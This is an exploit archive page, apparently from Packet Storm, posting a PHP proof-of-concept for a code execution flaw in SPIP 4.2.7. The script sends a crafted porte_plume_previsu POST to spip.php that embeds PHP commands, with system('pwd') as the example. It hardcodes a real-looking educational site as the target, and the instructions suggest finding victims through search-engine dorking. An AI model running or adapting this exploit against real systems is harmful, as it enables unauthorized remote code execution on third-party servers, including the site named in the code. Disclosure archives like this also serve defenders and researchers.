what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SPIP 4.2.7 Code Execution

SPIP 4.2.7 Code Execution
Posted Sep 2, 2024
Authored by indoushka

SPIP version 4.2.7 suffers from a code execution vulnerability.

tags | exploit, code execution
SHA-256 | 160ad4f3c2b9737ce719a722da0465d21060eaa5bdf0025e6c316b142389c830

SPIP 4.2.7 Code Execution

Change Mirror Download
=============================================================================================================================================
| # Title : SPIP 4.2.7 PHP Code execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://www.spip.net/ |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Line 49 : Set your target.

[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php

[+] Payload :

<?php

class IndoushkaExploit {
private $targetUrl;
private $payload;

public function __construct($targetUrl, $payload) {
$this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';
$this->payload = $this->generatePayload($payload);
}

private function generatePayload($payload) {
// توليد الحمولة مع تضمين الأمر المراد تنفيذه
return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";
}

public function exploit() {
// إعداد بيانات POST التي سيتم إرسالها إلى الهدف
$data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);

// تهيئة طلب HTTP باستخدام دالة cURL
$ch = curl_init($this->targetUrl);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

// إضافة رؤوس مخصصة لتجاوز المنع
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/x-www-form-urlencoded',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
]);

// تنفيذ الطلب
$response = curl_exec($ch);

// تحقق من وجود أخطاء في cURL
if (curl_errno($ch)) {
echo "cURL Error: " . curl_error($ch) . "\n";
} else {
echo "Exploit Sent! Response:\n";
echo $response;
}

curl_close($ch);
}
}

// مثال على الاستخدام
$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي
$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها

$exploit = new IndoushkaExploit($targetUrl, $payload);
$exploit->exploit();


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close